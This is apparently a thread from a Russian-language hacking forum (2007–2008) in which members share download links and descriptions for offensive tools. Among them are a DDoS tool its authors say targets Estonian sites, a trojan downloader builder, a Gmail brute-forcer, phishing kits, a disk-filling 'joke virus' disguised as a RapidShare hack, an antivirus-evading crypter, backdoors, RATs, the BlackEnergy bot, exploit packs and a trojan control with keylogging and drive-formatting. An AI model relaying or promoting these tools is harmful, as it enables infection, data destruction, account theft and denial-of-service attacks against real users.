Я думаю,що це найшвидший сканер портів для 32-розрядних версій Windows,що ви зможете знайти в Інтернеті.Він сканує 5000 локальних портів за 8 секунд на моїй машині(2k (P3-866).Щоправда,якщо Ви використовуєте Win9x/MЕ,то це буде дещо повільніше...Нова,п'ята версія має зараз має такі можливості як сканування портів за певним списком,Автозавершення якщо введені відомі,існуючі імена хостів і справді великий список типових програм,що займають порти.І звичайно,ця версія дещо стабільніша,особливо під Win9x/Me,незважаючи на те що ці ОС безперечно не є тими операційними систеиами які є хорошим вибором для використання даної програми.

Рекомендую!

Автор: ter10n 25.07.2007, 01:13

Релизик от ZyklonTeam



DDoS Attacker

DDoS Attacker многопоточный, поддержка Socks 4, Socks 5.
Написан на Delphi





http://zyklonteam.org/
http://zyklonteam.org/files/ddosattacker.rar
пометка авторов: Special for attacking fuc*ing Estonian sites.

Автор: ter10n 31.07.2007, 01:33

Builder trojan downloader v1.2 beta public



Даунлоадер - загружает на зараженный компьютер файл (например ваш трой) с url-a указанного в билдере.

Принцип работы:
После запуска сливает файл с url-a и сохраняет на зараженый компьютер
в директорию заданную билдером (например в папку винды), и запускает ваш файл.
После запуска вашего файла удаляет свое тело.

Это публичная версия, толком не тестировал, используйте на свой страх и риск.

Релиз от: 04.07.07
Автор: os1r1s
http://secnull.info/
http://rapidshare.com/files/41019158/builder_tdw.rar

Автор: 666Player555 28.08.2007, 16:15

WebProxy
http://rapidshare.com/files/51749387/sh0x-webproxy.rar
PW: Sh0x

PHP MSN
http://rapidshare.com/files/51749150/sh0x-msn.rar
PW: Sh0x

Автор: StuDY 4.09.2007, 18:09

 Paypal.rar ( 170,7 килобайт ) : 130

Автор: StuDY 6.09.2007, 14:10

Автор: Creeping Death 9.09.2007, 19:54

Gmail BruteForce

Автор: Creeping Death 11.09.2007, 13:26

Root@Shell
http://www.w4ck1ng.com/Root_Shell.rar

Автор: Creeping Death 11.09.2007, 20:04

пошел фишинг...

Adult Friend Finder

Автор: Creeping Death 13.09.2007, 21:57

File Bomber


::Disguised as a RapidShare account hacker

::This creates a bunch of copies of
the "readme.txt"
SO the bigger the "readme.txt" file is
the more space it shall take up

::It creates a file on how to "uninstall"
Rapid H4xid
Because this is just a joke virus
(And as of now, i do not know how to remove)
(So do not run on your computer)
(the subdomain http://howtoremove.dave.hohs.net will be used for the removal)
-the "no remove" files do not have this

::Creates 100,000 copies of "readme.txt" which takes up
-195 GB
-200000 MB
-204800000 KB
-209715200000 Bytes
Of Space

::You can only close it
if you cancel the process
in task manager


::Adds to startup on
-Vista
-XP
-WinNT
-Win 9x

::Works on operating systems
-Windows

::Creates the files
but hidden! So they cant delete
the files. it will just take up a lot
of space with them not knowing

::The files are called
"PORNO MOVIE#(insert number here).mov

::I tested myself. It works
It creates about 2,0000+ files in 10 minutes
and doesnt stop til it reachers 100,000 files

::Hide from task manager


http://rapidshare.com/files/55202841/RapidH4x1d.zip

http://rapidshare.com/files/55202839/R4pidH4x1d_-_no_remove.zip

http://rapidshare.com/files/55202842/RapidH4x1d2.zip

http://rapidshare.com/files/55202840/RapidH4x1d2_-_no_remove.zip

Автор: Creeping Death 17.10.2007, 22:46

STNC 0day tool google-php-include-bugs searcher v 0.8

Автор: Creeping Death 19.10.2007, 18:32

Free Cryptor build 002

(IMG:http://www.soft.glofff.com/img/screen/freecryptor1.png)

Download: http://www.soft.glofff.com/downloads/fc.rar
Official web site: http://soft.glofff.com

A-Squared Found nothing
AntiVir Found TR/Crypt.XPACK.Gen

ArcaVir Found nothing
Avast Found nothing
AVG Antivirus Found nothing
BitDefender Found nothing
ClamAV Found nothing
CPsecure Found nothing
Dr.Web Found nothing
F-Prot Antivirus Found nothing
F-Secure Anti-Virus Found nothing
Fortinet Found nothing
Kaspersky Anti-Virus Found nothing
NOD32 Found nothing
Norman Virus Control Found nothing
Panda Antivirus Found nothing
Rising Antivirus Found nothing
Sophos Antivirus Found Mal/Basine-C
VirusBuster Found nothing
VBA32 Found nothing

Thx to Prosto

Автор: Creeping Death 28.10.2007, 00:19

небольшой backdoor, написанный на Delphi. вчера еще не палился.

 Shell.rar ( 25,43 килобайт ) : 56

Автор: Creeping Death 28.10.2007, 13:00

Joomla rfi Scanner

Heres a simple scanner for the web app Joomla. Scans known vulnerable RFI path/files in Joomla and reports http response.
Cпасибо d3hydr8

http://www.md5this.com/joomlascan.rar

Автор: неузнаваемый 10.12.2007, 16:58

BlackEnergy bot 1.9.2.rar Приклеен вирус так что запускаем на виртуальной машине!

Автор: неузнаваемый 17.12.2007, 14:15

Sqlninja 0.2.1-r1
Sqlninja - маленький инструмент на Perl для эксплуатации уязвимости SQL-injection. Его главная цель состоит в том, чтобы обеспечить удаленный доступ к уязвимому серверу базы данных. В этойверсии можно выделить такие изменения, как улучшение механизма распознования, добавление брутофорс атаки, устранение некоторых ошибок из предыдущей версии.

http://www.web-hack.ru.hosted.by.0x7.net/soft/brut/sqlninja-0.2.1-r1.tgz

http://www.web-hack.ru/

Автор: неузнаваемый 19.12.2007, 13:14

CZ stat for "agent dq" new!
wowloader 0.8c

ntechloader 1.2se

Mpack 0.99
SASH.cc site 2007

N-spy and N-code

Nuclear traff new!
pass:123

Автор: Creeping Death 2.01.2008, 16:18

Fishing_Bait_2.5

http://rs100.rapidshare.com/files/51327122/Fishing_Bait_2.5_-_www.SilentHex.info.rar

Автор: Creeping Death 3.01.2008, 18:50

MultiBinder 1.1 Fully Undetected
http://www.fileshare.ro/452977910.405

Hav-Rat 1.2 [Private Version]
http://rapidshare.com/files/77201630/Hav-Rat_1.2_Private_Edition.rar

NyTrojan OCX

Function :

1) OpenCDRom
2) CloseCDRom
3) ShowTaskBar
4) HideTaskBar
5) HideMouse
6) ShowMouse
7) LockExe
8) UnLockExe
9) HideClock
10) ShowClock
11) HideStart
12) ShowStart
13) HideIcons
14) ShowIcons
15) DisableTaskManager
16) EnableTaskManager
17) EmptyFolder
18) DesktopFolderFlood
19) DesktopFolderDelete
20) DisableSystemRestore
21) EnableSystemRestore
22) KillProcess
23) AutoDownload
24) SetStartButtonCaption
25) AddToStartUp
26) FreezeMouse
27) StopFreezeMouse
28) CrazyMouse
29) StopCrazyMouse
30) BeepFlood
31) StopBeepFlood
32) Abort
33) LogOff
34) ShutDown
35) Restart
36) Author
37) OpenWebSite
38) FormatDrive
39) SwapMouseButtons
40) StopSwapMouseButtons
41) BypassWindowsFirewall
42) TurnOffMonitor
43) TurnOnMonitor
44) StartKeylogging
45) StopKeylogging
46) Keylog


http://rapidshare.com/files/79649642/NyTrOjan.ocxhttp://www.speedyshare.com/590347578.html
http://uploaded.to/?id=wltwes
http://www2.eushare.com/download.php?file=NyTrOjan.ocx
http://www.netdrive.ws/40441.html

Zombie Rat v1.0

C0der:"The Bo$$"
Coded in : 90% Delphi, 10%Asm
http://rapidshare.com/files/79701258/ZombieRat.cab.html

Автор: Creeping Death 3.01.2008, 19:16

Scaner RFI cu >400 buguri